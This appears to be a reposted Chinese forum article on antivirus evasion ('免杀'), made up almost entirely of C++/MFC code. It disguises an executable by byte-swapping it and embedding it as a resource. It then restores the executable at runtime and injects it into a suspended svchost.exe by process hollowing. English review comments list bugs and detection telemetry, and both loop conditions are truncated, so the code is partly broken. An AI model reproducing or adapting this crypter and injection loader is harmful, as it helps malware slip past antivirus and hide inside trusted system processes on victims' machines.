
通用exe编程免杀[转贴]

2010-11-10 03:15 232 查看
01  //修改过的可执行程序以资源的形式添加到另外一个正常的可执行程序中
// Reads the file strRstFile into memory, swaps each adjacent pair of bytes,
// and stores the result as custom resource type "PI", id 1001, in the
// executable strDstFile.  This is the build-time half of the pair; OnBuild
// (below) applies the same swap again at run time to recover the original.
// Parameters: strRstFile - file to embed; strDstFile - host executable whose
//             resource section is rewritten in place.
// Returns: the result of EndUpdateResource, or 0 when GlobalAlloc fails.
// NOTE(review): MessageBox is called with two arguments, so this is an MFC
// window member; the enclosing class is not on the page.
// NOTE(review): rstdata (new[]) and p (GlobalAlloc) are never released; the
// return values of file.Open and BeginUpdateResource are not checked; and
// `result` from UpdateResource is overwritten by EndUpdateResource, so a
// failed UpdateResource is masked.
// Detection angle: this rewrites the resource section of an existing PE on
// disk - a modification of an executable file that file-integrity monitoring
// and EDR typically record.
BOOL Deformation(CString strRstFile,CString strDstFile)
{
        CFile file;
        BYTE *rstdata;
        DWORD dwLen;
        HANDLE hUpdateRes;
        BOOL result;
        LPBYTE p;
        // Read the file that will become the resource into memory.
        file.Open(strRstFile, CFile::modeRead);
        dwLen=file.GetLength();
        rstdata=new BYTE[dwLen];
        file.ReadHuge(rstdata, dwLen);
        file.Close();

        // Allocate space for the data.
        p = (LPBYTE)GlobalAlloc(GPTR, dwLen);
        if (p == NULL)
        {
                MessageBox("分配内存失败!", "错误", MB_OK|MB_ICONINFORMATION);
                return 0;
        }
        // Copy the resource data.
        CopyMemory((LPVOID)p, (LPCVOID)rstdata, dwLen);
        // Author's note: the two bytes of each pair are swapped here so the
        // embedded file no longer matches the AV signature scan.
        // The loop condition was lost in the paste (the `<` was most likely
        // swallowed as markup); it is presumably bounded by dwLen - confirm
        // against the original post.  When the length is odd, the last pair
        // reads rstdata[dwLen] and writes p[dwLen], one byte past both buffers.
        for (DWORD i=0; i
        {
                if (i%2 ==0)
                {
                        CopyMemory((LPVOID)(p + i), (LPCVOID)(rstdata + i + 1), 1);
                        CopyMemory((LPVOID)(p + i + 1), (LPCVOID)(rstdata + i), 1);
                }
                i++;
        }

        // Write the resource into the target exe.
        hUpdateRes=BeginUpdateResource(strDstFile, FALSE);
        result=UpdateResource(hUpdateRes, _T("PI"), MAKEINTRESOURCE(1001), MAKELANGID(LANG_NEUTRAL, SUBLANG_SYS_DEFAULT), (LPVOID)p, dwLen);
        result=EndUpdateResource(hUpdateRes, FALSE);                // Must be FALSE, otherwise the update is not written.
        return result;
}
        //将修改过的可执行程序读入内存,并恢复原状,然后加以运行。
// Run-time half of Deformation: locates the embedded resource, undoes the
// pairwise byte swap, then runs the recovered image inside a suspended
// svchost.exe by unmapping that process's own image and writing the
// recovered PE over it (process hollowing).
// Returns: 0 on the early-exit paths and also 0 after the child is resumed;
//          FALSE on the failures inside the CreateProcess branch.  The return
//          value therefore cannot distinguish success from failure.
// NOTE(review): the wizard-generated TODO below suggests this is an MFC
// control handler; the enclosing class, IDR_PI1 (resource.h) and the
// ZWUNMAPVIEWOFSECTION typedef are not on the page.
// NOTE(review): the function is x86-only - it relies on CONTEXT.Ebx/Eax and
// casts ImageBase and pi.hProcess to 32-bit integers.
// Detection angle: CreateProcess(CREATE_SUSPENDED) -> ZwUnmapViewOfSection on
// the child's image base -> VirtualAllocEx with PAGE_EXECUTE_READWRITE ->
// WriteProcessMemory -> SetThreadContext -> ResumeThread is the canonical
// process-hollowing sequence (MITRE ATT&CK T1055.012).  EDR telemetry keys on
// this API chain, and memory scanners flag an svchost.exe whose in-memory
// image does not match its on-disk file.
bool OnBuild()
{
        // TODO: Add your control notification handler code here
        HRSRC hResInfo;
        HGLOBAL hResData;
        DWORD dwSize;
        LPBYTE p;
        LPBYTE q;

        // Find the required resource.  Type "pi" presumably matches the "PI"
        // type written by Deformation - confirm case handling; IDR_PI1 comes
        // from the project's resource.h.
        hResInfo = FindResource(NULL, MAKEINTRESOURCE(IDR_PI1), "pi");
        if (hResInfo == NULL)
        {
                MessageBox("查找资源失败!", "错误", MB_OK|MB_ICONINFORMATION);
                return 0;
        }
        // Get the resource size.
        dwSize = SizeofResource(NULL, hResInfo);
        // Load the resource.
        hResData = LoadResource(NULL, hResInfo);
        if (hResData == NULL)
        {
                MessageBox("装载资源失败!", "错误", MB_OK|MB_ICONINFORMATION);
                return 0;
        }
        // Allocate space for the data: p receives the un-swapped image,
        // q keeps a verbatim copy to swap from.
        p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
        if (p == NULL)
        {
                MessageBox("p分配内存失败!", "错误", MB_OK|MB_ICONINFORMATION);
                return 0;
        }

        q = (LPBYTE)GlobalAlloc(GPTR, dwSize);
        if (q == NULL)                  // NOTE(review): p leaks on this path.
        {
                MessageBox("q分配内存失败!", "错误", MB_OK|MB_ICONINFORMATION);
                return 0;
        }
        // Copy the resource data.
        ::CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
        ::CopyMemory((LPVOID)q, (LPCVOID)LockResource(hResData), dwSize);
        // Restore the executable here: the same pairwise swap as Deformation,
        // read from the copy in q - the swap is its own inverse.
        // The loop condition was lost in the paste (the `<` was most likely
        // swallowed as markup); presumably bounded by dwSize - confirm against
        // the original post.  As in Deformation, an odd dwSize makes the last
        // pair touch one byte past both buffers.
        for (DWORD i=0; i
        {
                if (i%2 ==0)
                {
                        ::CopyMemory((LPVOID)(p + i), (LPVOID)(q + i + 1), 1);
                        ::CopyMemory((LPVOID)(p + i + 1), (LPVOID)(q + i), 1);
                }
                i++;
        }

        IMAGE_DOS_HEADER DosHeader;
        IMAGE_NT_HEADERS NtHeader;

        PROCESS_INFORMATION pi;
        STARTUPINFO si;
        CONTEXT context;
        PVOID ImageBase;
        unsigned long BaseAddr;
        unsigned long retByte = 0;
        LONG offset;

        // ZwUnmapViewOfSection is resolved dynamically from ntdll; the
        // ZWUNMAPVIEWOFSECTION typedef is defined elsewhere.  The
        // GetProcAddress result is not NULL-checked before use below.
        HMODULE hNtDll=GetModuleHandle("ntdll.dll");
        if(!hNtDll)
                return FALSE;
        ZWUNMAPVIEWOFSECTION ZwUnmapViewOfSection = (ZWUNMAPVIEWOFSECTION)GetProcAddress(hNtDll,"ZwUnmapViewOfSection");

        memset(&si, 0, sizeof(si));
        memset(&pi, 0, sizeof(pi));
        si.cb = sizeof(si);

        // Copy the DOS and NT headers out of the recovered image.
        // NOTE(review): neither e_magic / Signature nor e_lfanew is validated
        // against dwSize, so a malformed resource reads past p here.
        ::CopyMemory((void *)&DosHeader,p,sizeof(IMAGE_DOS_HEADER));
        ::CopyMemory((void *)&NtHeader,&p[DosHeader.e_lfanew],sizeof(IMAGE_NT_HEADERS));

        // Create the process suspended.  The doubled `//` in the path looks
        // like the page's rendering of `\\` - confirm against the original.
        BOOL res = CreateProcess(NULL,"C://windows//system32//svchost.exe",NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&si,&pi);

        if (res)
        {
                context.ContextFlags = CONTEXT_FULL;
                if (!GetThreadContext(pi.hThread,&context))                // If the call fails
                {
                        CloseHandle(pi.hThread);
                        CloseHandle(pi.hProcess);
                        return FALSE;
                }
                // Read a 4-byte value at Ebx+8 in the child; the same address
                // is overwritten with ImageBase further down, so this is the
                // child's current image base (presumably the x86 PEB's
                // image-base field - TODO confirm).
                ReadProcessMemory(pi.hProcess,(void *)(context.Ebx + 8),&BaseAddr,sizeof(unsigned long),NULL);
                if (!BaseAddr)
                {
                        CloseHandle(pi.hThread);
                        CloseHandle(pi.hProcess);
                        return FALSE;
                }
                // Unmap the puppet process's own image.
                if (ZwUnmapViewOfSection((unsigned long)pi.hProcess,BaseAddr))
                {
                        CloseHandle(pi.hThread);
                        CloseHandle(pi.hProcess);
                        return FALSE;
                }
                // Commit the recovered image's preferred base at its full
                // SizeOfImage, RWX; if that address is unavailable the
                // function bails out.
                ImageBase = VirtualAllocEx(pi.hProcess,
                        (void *)NtHeader.OptionalHeader.ImageBase,
                        NtHeader.OptionalHeader.SizeOfImage,
                        MEM_RESERVE|MEM_COMMIT,
                        PAGE_EXECUTE_READWRITE);                // ImageBase 0x00400000
                if (ImageBase == NULL)
                {
                        DWORD wrongFlag = GetLastError();       // read for debugging only; unused
                        CloseHandle(pi.hThread);
                        CloseHandle(pi.hProcess);
                        return FALSE;
                }
                // Replace the puppet process's memory: headers first.
                // NOTE(review): a failure here is recorded but not acted on.
                if(!WriteProcessMemory(pi.hProcess, ImageBase, p, NtHeader.OptionalHeader.SizeOfHeaders, &retByte))
                {
                        DWORD wrongFlag2 = GetLastError();
                }
                // Total size of DOS header + PE header + section table:
                // position at the section headers.
                offset = DosHeader.e_lfanew + sizeof(IMAGE_NT_HEADERS);
                IMAGE_SECTION_HEADER secHeader;
                WORD i = 0;
                for (;i < NtHeader.FileHeader.NumberOfSections;i++)
                {
                        // Locate each section and copy its raw data to its
                        // virtual address.  NOTE(review): PointerToRawData /
                        // SizeOfRawData are not checked against dwSize, and
                        // the WriteProcessMemory result is ignored.  BaseAddr
                        // is reused here only as the old-protection out-param.
                        ::CopyMemory((void *)&secHeader, &p[offset + i*sizeof(IMAGE_SECTION_HEADER)],sizeof(IMAGE_SECTION_HEADER));
                        WriteProcessMemory(pi.hProcess,(LPVOID)((DWORD)ImageBase + secHeader.VirtualAddress),&p[secHeader.PointerToRawData],secHeader.SizeOfRawData,&retByte);
                        VirtualProtectEx(pi.hProcess, (LPVOID)((DWORD)ImageBase + secHeader.VirtualAddress), secHeader.Misc.VirtualSize, PAGE_EXECUTE_READWRITE,&BaseAddr);
                }

                context.ContextFlags = CONTEXT_FULL;
                // Reset the executable's entry point: store the new image base
                // back at Ebx+8 and point Eax at AddressOfEntryPoint.
                WriteProcessMemory(pi.hProcess, (void *)(context.Ebx + 8),
                        &ImageBase,                        // 4194304
                        4, &retByte);
                context.Eax = (unsigned long)ImageBase + NtHeader.OptionalHeader.AddressOfEntryPoint;
                SetThreadContext(pi.hThread,&context);
                ResumeThread(pi.hThread);
        }

        // Also reached when CreateProcess failed, with pi still zeroed.
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);

        GlobalFree((HGLOBAL)p);           // NOTE(review): q is never freed.

        return 0;
}